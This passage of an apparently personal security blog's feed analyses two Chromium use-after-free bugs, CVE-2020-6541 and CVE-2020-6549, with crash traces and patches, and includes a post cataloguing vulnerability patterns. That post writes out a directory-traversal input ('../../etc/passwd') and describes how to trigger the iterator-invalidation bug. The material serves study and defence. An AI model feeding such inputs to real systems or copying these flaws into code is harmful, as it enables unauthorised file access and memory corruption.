class="keyword">public</span>/cpp/bindings/lib/interface_endpoint_client.cc:<span class="number">376</span>:<span class="number">31</span></span><br><span class="line">    #<span class="number">14</span> <span class="number">0x7fd4a23accaf</span> in mojo::internal::MultiplexRouter::<span class="built_in">ProcessNotifyErrorTask</span>(mojo::internal::MultiplexRouter::Task*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">873</span>:<span class="number">13</span></span><br><span class="line">    #<span class="number">15</span> <span class="number">0x7fd4a23a6e92</span> in mojo::internal::MultiplexRouter::<span class="built_in">ProcessTasks</span>(mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">786</span>:<span class="number">15</span></span><br><span class="line">    #<span class="number">16</span> <span class="number">0x7fd4a23a2ad5</span> in mojo::internal::MultiplexRouter::<span class="built_in">OnPipeConnectionError</span>(<span class="type">bool</span>) ./../../mojo/<span class="keyword">public</span>/cpp/bindings/lib/multiplex_router.cc:<span class="number">729</span>:<span class="number">3</span></span><br><span class="line">    #<span class="number">17</span> <span class="number">0x7fd4a238653e</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">18</span> <span class="number">0x7fd4a238653e</span> in mojo::Connector::<span class="built_in">HandleError</span>(<span class="type">bool</span>, <span class="type">bool</span>) ./../../mojo/<span 
class="keyword">public</span>/cpp/bindings/lib/connector.cc:<span class="number">635</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">19</span> <span class="number">0x7fd4a230e3d4</span> in base::RepeatingCallback&lt;<span class="built_in">void</span> (<span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;)&gt;::<span class="built_in">Run</span>(<span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;) <span class="type">const</span> &amp; ./../../base/callback.h:<span class="number">133</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">20</span> <span class="number">0x7fd4a230e3d4</span> in mojo::SimpleWatcher::<span class="built_in">OnHandleReady</span>(<span class="type">int</span>, <span class="type">unsigned</span> <span class="type">int</span>, mojo::HandleSignalsState <span class="type">const</span>&amp;) ./../../mojo/<span class="keyword">public</span>/cpp/system/simple_watcher.cc:<span class="number">292</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">21</span> <span class="number">0x7fd4a32928f7</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">22</span> <span class="number">0x7fd4a32928f7</span> in base::TaskAnnotator::<span class="built_in">RunTask</span>(<span class="type">char</span> <span class="type">const</span>*, base::PendingTask*) ./../../base/task/common/task_annotator.cc:<span class="number">142</span>:<span class="number">33</span></span><br><span class="line">    #<span class="number">23</span> <span class="number">0x7fd4a32d20ca</span> in 
base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWorkImpl</span>(base::sequence_manager::LazyNow*) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">333</span>:<span class="number">23</span></span><br><span class="line">    #<span class="number">24</span> <span class="number">0x7fd4a32d19ec</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">DoWork</span>() ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">253</span>:<span class="number">36</span></span><br><span class="line">    #<span class="number">25</span> <span class="number">0x7fd4a318bded</span> in base::MessagePumpDefault::<span class="built_in">Run</span>(base::MessagePump::Delegate*) ./../../base/message_loop/message_pump_default.cc:<span class="number">39</span>:<span class="number">55</span></span><br><span class="line">    #<span class="number">26</span> <span class="number">0x7fd4a32d3332</span> in base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::<span class="built_in">Run</span>(<span class="type">bool</span>, base::TimeDelta) ./../../base/task/sequence_manager/thread_controller_with_message_pump_impl.cc:<span class="number">452</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">27</span> <span class="number">0x7fd4a3228f7a</span> in base::RunLoop::<span class="built_in">Run</span>() ./../../base/run_loop.cc:<span class="number">124</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">28</span> <span class="number">0x7fd49b59f386</span> in content::<span class="built_in">RendererMain</span>(content::MainFunctionParams <span class="type">const</span>&amp;) ./../../content/renderer/renderer_main.cc:<span class="number">230</span>:<span class="number">16</span></span><br><span class="line">    #<span 
class="number">29</span> <span class="number">0x7fd49b939cbe</span> in content::<span class="built_in">RunZygote</span>(content::ContentMainDelegate*) ./../../content/app/content_main_runner_impl.cc:<span class="number">502</span>:<span class="number">14</span></span><br><span class="line">    #<span class="number">30</span> <span class="number">0x7fd49b93d218</span> in content::ContentMainRunnerImpl::<span class="built_in">Run</span>(<span class="type">bool</span>) ./../../content/app/content_main_runner_impl.cc:<span class="number">882</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">31</span> <span class="number">0x7fd4a3542976</span> in service_manager::<span class="built_in">Main</span>(service_manager::MainParams <span class="type">const</span>&amp;) ./../../services/service_manager/embedder/main.cc:<span class="number">453</span>:<span class="number">29</span></span><br><span class="line">    #<span class="number">32</span> <span class="number">0x7fd49b93812f</span> in content::<span class="built_in">ContentMain</span>(content::ContentMainParams <span class="type">const</span>&amp;) ./../../content/app/content_main.cc:<span class="number">19</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">33</span> <span class="number">0x55c339598713</span> in ChromeMain ./../../chrome/app/chrome_main.cc:<span class="number">117</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">34</span> <span class="number">0x7fd46bb86e0a</span> in __libc_start_main /build/glibc-M65Gwz/glibc<span class="number">-2.30</span>/csu/../csu/libc-start.c:<span class="number">308</span>:<span class="number">16</span></span><br><span class="line"></span><br><span class="line">Address <span class="number">0x7ec19e552e28</span> is a wild pointer.</span><br><span class="line">SUMMARY: AddressSanitizer: use-after-<span class="built_in">poison</span> 
(/chromium/src/out/release_asan/libblink_modules.so<span class="number">+0x26b4ced</span>)</span><br><span class="line">Shadow bytes around the buggy address:</span><br><span class="line">  <span class="number">0x0fd8b3ca2570</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca2580</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca2590</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25a0</span>: <span class="number">00</span> <span 
class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25b0</span>: <span class="number">00</span> <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">=&gt;<span class="number">0x0fd8b3ca25c0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7 f7[f7]f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25d0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span 
class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25e0</span>: <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> f7 f7 f7 f7 <span class="number">00</span> f7 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">  <span class="number">0x0fd8b3ca25f0</span>: <span class="number">00</span> f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fd8b3ca2600</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">  <span class="number">0x0fd8b3ca2610</span>: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7</span><br><span class="line">Shadow byte <span class="built_in">legend</span> (one shadow byte represents <span class="number">8</span> application bytes):</span><br><span class="line">  Addressable:           <span class="number">00</span></span><br><span class="line">  Partially addressable: <span class="number">01</span> <span class="number">02</span> <span class="number">03</span> <span class="number">04</span> <span class="number">05</span> <span class="number">06</span> <span class="number">07</span></span><br><span class="line">  Heap left redzone:       fa</span><br><span class="line">  Freed heap region:       fd</span><br><span class="line">  Stack left redzone:      f1</span><br><span class="line">  Stack mid redzone:       f2</span><br><span class="line">  Stack right redzone:     f3</span><br><span class="line">  Stack after <span class="keyword">return</span>:      f5</span><br><span class="line">  Stack use after scope:   f8</span><br><span class="line">  Global redzone:          f9</span><br><span class="line">  Global init order:       f6</span><br><span class="line">  Poisoned by 
user:        f7</span><br><span class="line">  Container overflow:      fc</span><br><span class="line">  Array cookie:            ac</span><br><span class="line">  Intra object redzone:    bb</span><br><span class="line">  ASan internal:           fe</span><br><span class="line">  Left alloca redzone:     ca</span><br><span class="line">  Right alloca redzone:    cb</span><br><span class="line">  Shadow gap:              cc</span><br><span class="line">==<span class="number">1</span>==ABORTING</span><br></pre></td></tr></table></figure><h3 id="3-漏洞补丁">3. 漏洞补丁</h3><p>与之前分析的CVE-2020-6549一样，新的补丁都是在迭代前先将集合复制一份，之后再迭代新复制出的集合。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Move the set to a local variable to prevent script execution in Resolve()</span></span><br><span class="line">  <span class="comment">// from invalidating the iterator used by the loop.</span></span><br><span 
class="line">  HeapHashSet&lt;Member&lt;ScriptPromiseResolver&gt;&gt; get_devices_requests;</span><br><span class="line">  get_devices_requests.<span class="built_in">swap</span>(get_devices_requests_);</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span>&amp; resolver : get_devices_requests)</span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Move the set to a local variable to prevent script execution in Reject()</span></span><br><span class="line">  <span class="comment">// from invalidating the iterator used by the loop.</span></span><br><span class="line">  HeapHashSet&lt;Member&lt;ScriptPromiseResolver&gt;&gt; get_permission_requests;</span><br><span class="line">  get_permission_requests.<span class="built_in">swap</span>(get_permission_requests_);</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span>&amp; resolver : get_permission_requests) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、参考">三、参考</h2><ul><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2068">Issue 2068: Chrome: Use-after-free in USB::OnServiceConnectionError</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2020-6541 is a use-after-free vulnerability in Chromium's WebUSB implementation. In versions before 84.0.4147.105, it allows an attacker to cause heap corruption through a crafted HTML page.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/vulnerability-analysis/chrome/"/>
    
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>Some Interesting Vulnerability Patterns</title>
    <link href="https://kiprey.github.io/2020/10/vuln-patterns/"/>
    <id>https://kiprey.github.io/2020/10/vuln-patterns/</id>
    <published>2020-10-25T13:54:35.000Z</published>
    <updated>2025-11-24T03:59:40.218Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>An ongoing collection of vulnerability patterns I come across.</li></ul><span id="more"></span><h2 id="1-条件竞争">1. Race Conditions</h2><ul><li><p>In a <strong>multithreaded</strong> program, a resource that is not locked in time can be modified by another thread while it is still in use, and the code that keeps operating on it afterwards introduces a vulnerability.</p></li><li><p>Example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Multithreaded code</span></span><br><span class="line"><span class="keyword">if</span>(ptr)</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  <span class="comment">// Note: user_buf is an mmap-ed region that has not been initialized yet</span></span><br><span class="line">  <span class="built_in">copy_from_user</span>(ptr,user_buf,len);</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>In this example, <code>user_buf</code> is only mapped and has no physical memory allocated yet when <code>copy_from_user</code> runs, so the first access triggers a page fault and the CPU runs the page-fault handler. <code>copy_from_user</code> is suspended until the handler returns.</li><li>If, during that window, another thread frees <code>ptr</code> and some <strong>important structure</strong> is then allocated in the memory that was just freed, the resumed copy can modify that <strong>important structure</strong>.</li></ul></li></ul><h2 id="2-整数溢出">2. 
Integer Overflow</h2><ul><li><p>The result of an integer operation falls outside the representable range, causing an overflow or underflow.</p></li><li><p>This bug class is very common, because most code does not account for overflow in arithmetic.</p></li><li><p>Examples</p><ul><li><p>Example 1</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen is attacker-controlled</span></span><br><span class="line">ptr = <span class="built_in">realloc</span>(ptr, metaLen + dataLen);</span><br><span class="line"><span class="comment">// If metaLen + dataLen overflows, realloc only allocates a small block,</span></span><br><span class="line"><span class="comment">// which makes a heap overflow possible</span></span><br></pre></td></tr></table></figure></li><li><p>Example 2</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> total_len;</span><br><span class="line"><span class="type">int</span> meta_len;</span><br><span class="line">...</span><br><span class="line"><span class="comment">// meta_len is attacker-controlled</span></span><br><span class="line"><span class="type">unsigned</span> <span class="type">int</span> data_len = total_len - meta_len;</span><br><span class="line"><span class="comment">// If meta_len &gt; total_len, data_len becomes huge, e.g. (unsigned)(-1) == 0xFFFFFFFF for a 32-bit unsigned int</span></span><br></pre></td></tr></table></figure></li></ul></li><li><p>How to check for integer overflow</p><ul><li><p>Overflow is certainly not checked like this (lol)</p><blockquote><p>Note: <code>metaLen</code> and <code>dataLen</code> are both of type <code>int</code>, so their sum, itself an <code>int</code>, can never compare greater than <code>INT_MAX</code>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen is attacker-controlled</span></span><br><span class="line"><span class="keyword">if</span>(metaLen + dataLen &gt; 
INT_MAX)</span><br><span class="line">&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>It is usually checked like this instead</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen is attacker-controlled</span></span><br><span class="line"><span class="keyword">if</span>(INT_MAX - dataLen &lt; metaLen)</span><br><span class="line">&#123; ... &#125;</span><br></pre></td></tr></table></figure></li><li><p>But once the check expression gets more complicated</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// dataLen is attacker-controlled</span></span><br><span class="line"><span class="keyword">if</span>(INT_MAX - ( <span class="number">1</span> + dataLen + <span class="number">1</span>) &lt; metaLen)</span><br><span class="line">&#123; </span><br><span class="line">  ...</span><br><span class="line">  ptr = <span class="built_in">realloc</span>(ptr, (metaLen + <span class="number">1</span>) + (dataLen + <span class="number">1</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This can still overflow: <code>1 + dataLen + 1</code> inside the check can itself overflow when <code>dataLen</code> is close to <code>INT_MAX</code>.</p><p>So a correct check should keep <strong>user-controlled variables</strong> and <strong>variables the user cannot control</strong> on separate sides of the comparison</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(user_controlled_var &lt; (uncontrolled_var<span class="number">1</span> op uncontrolled_var<span class="number">2</span> ...))</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span 
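class="line">&#125;</span><br></pre></td></tr></table></figure><p>Take extra care here.</p></li></ul></li></ul><h2 id="3-目录遍历漏洞">3. Directory Traversal</h2><ul><li><p>When a program operates on a file and needs its absolute path, it concatenates the current working directory with the file name:</p><blockquote><p><code>/home/kiprey/</code> + <code>targetFilename</code> = <code>/home/kiprey/targetFilename</code></p></blockquote></li><li><p>But what if <code>targetFilename</code> does not play by the rules?</p><blockquote><p>For example, <code>targetFilename</code> = <code>../../etc/passwd</code><br>The concatenated path is then <code>/home/kiprey/../../etc/passwd</code>, which resolves to <code>/etc/passwd</code>, a sensitive file.<br>This is a <strong>directory traversal vulnerability</strong>.</p></blockquote></li><li><p>One might object that a file name cannot contain <code>/</code>. That is true, but the <strong>data</strong> inside a data file can.<br>For example, a program reads a file name out of a data file, resolves the absolute path of the named file, and sends that file out.<br>The file name stored in the data file is not subject to that restriction and may contain slashes, because at that point it is just data.<br>If the data file is carefully crafted, the program may well end up sending out a sensitive file.</p></li></ul><h2 id="4-迭代器失效漏洞">4. Iterator Invalidation</h2><p>Taking CVE-2020-6541 and CVE-2020-6549 as examples, most bugs of this class trigger a UAF through the following flow:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Iterate over an element collection Set, calling function A on each element</span><br><span class="line">    Inside function A, call ...</span><br><span class="line">    ...</span><br><span class="line">    Inside function M, change the number of elements in Set (insert or erase), then return</span><br></pre></td></tr></table></figure><p>When control flow returns from function M all the way back up to the outermost loop, <strong>the collection being iterated has been modified</strong>, so <strong>the iterator used for the next step is invalid</strong>. This results in a UAF.</p><h2 id="Continuing…">Continuing…</h2>]]></content>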
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;An ongoing collection of vulnerability patterns I come across.&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="vuln patterns" scheme="https://kiprey.github.io/tags/vuln-patterns/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6549 Analysis</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2020-6549/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2020-6549/</id>
    <published>2020-10-17T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.772Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li>CVE-2020-6549是Google Chrome里media中的Use-after-free漏洞，在版本84.0.4147.125之前该漏洞允许攻击者通过精心构造的html代码来造成堆破坏。</li></ul><span id="more"></span><h2 id="二、漏洞相关">二、漏洞相关</h2><h3 id="a-漏洞概述">a. 漏洞概述</h3><p>漏洞函数 - <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/mediacapturefromelement/html_media_element_capture.cc;l=239;drc=229c7c3d0ce550a83edbbff0d8301d6677fe0328">vuln src</a></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>()) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_)</span><br><span class="line">      <span 
class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当media元素加载跨域URL时，函数<code>UpdateSources</code>将会通知相关的<code>MediaStreamSource</code>对象。而在遍历<code>sources_</code>集时，它可能会通过以下调用路径来调度JS事件。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">MediaElementEventListener::UpdateSources</span><br><span class="line">  DidStopMediaStreamSource</span><br><span class="line">    <span class="comment">// Stops the source (by calling DoStopSource()) and runs FinalizeStopSource().</span></span><br><span class="line">    WebPlatformMediaStreamSource::StopSource</span><br><span class="line">      <span class="comment">// Runs the stop callback (if set) and sets the</span></span><br><span class="line">      <span class="comment">// WebMediaStreamSource::readyState to ended. 
This can be used by</span></span><br><span class="line">      <span class="comment">// implementations to implement custom stop methods.</span></span><br><span class="line">      WebPlatformMediaStreamSource::FinalizeStopSource</span><br><span class="line">        WebMediaStreamSource::SetReadyState</span><br><span class="line">          MediaStreamSource::SetReadyState</span><br><span class="line">            <span class="comment">// MediaStreamSourceObserver</span></span><br><span class="line">            MediaStreamTrack::SourceChangedState</span><br><span class="line">              EventTarget::DispatchEvent</span><br></pre></td></tr></table></figure><p>An attacker can register an event handler on the corresponding <code>MediaStreamTrack</code> object. The handler <strong>dispatches a fake <code>loadedmetadata</code> event</strong> on the media element, which <strong>re-enters <code>UpdateSources</code></strong> and <strong>resizes its <code>sources_</code> set</strong>. This <strong>invalidates the iterator used by the range-based for loop</strong> in the outer <code>UpdateSources</code> call. When execution returns to the outer call, the loop tries to fetch the next element through the invalidated iterator, which results in a UAF.</p><h3 id="b-漏洞细节">b. Vulnerability Details</h3><h4 id="1-加载跨域URL">1. 
Loading a Cross-Origin URL</h4><p>The vulnerable function <code>MediaElementEventListener::UpdateSources</code> calls <code>DidStopMediaStreamSource</code> on every <code>MediaStreamSource</code> object. Before <code>sources_</code> is processed, one condition must hold: the media must be <strong>cross-origin</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"></span><br><span class="line">  <span class="comment">// If the current src (i.e. the URL) is non-empty and cross-origin, process sources_</span></span><br><span class="line">  <span class="keyword">if</span> (!media_element_-&gt;<span class="built_in">currentSrc</span>().<span class="built_in">IsEmpty</span>() &amp;&amp;</span><br><span class="line">      !media_element_-&gt;<span class="built_in">IsMediaDataCorsSameOrigin</span>()) &#123;</span><br><span class="line">    <span class="comment">// Iterate over sources_ and stop each source</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> source : sources_)</span><br><span class="line">      <span class="built_in">DidStopMediaStreamSource</span>(source.<span class="built_in">Get</span>());</span><br><span 
class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="2-设置对应的事件处理函数">2. Setting Up the Event Handler</h4><ul><li><p>For each entry in <code>sources_</code>, <code>DidStopMediaStreamSource()</code> fetches the corresponding <code>WebPlatformMediaStreamSource</code> and calls <code>StopSource()</code> on it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">DidStopMediaStreamSource</span><span class="params">(MediaStreamSource* source)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!source)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  <span class="comment">// Fetch the WebPlatformMediaStreamSource</span></span><br><span class="line">  WebPlatformMediaStreamSource* <span class="type">const</span> platform_source =</span><br><span class="line">      source-&gt;<span class="built_in">GetPlatformSource</span>();</span><br><span class="line">  <span class="built_in">DCHECK</span>(platform_source);</span><br><span class="line">  <span class="comment">// Call StopSource on the WebPlatformMediaStreamSource</span></span><br><span class="line">  platform_source-&gt;<span class="built_in">StopSource</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Inside <code>StopSource</code>, the call we care about is <code>FinalizeStopSource()</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
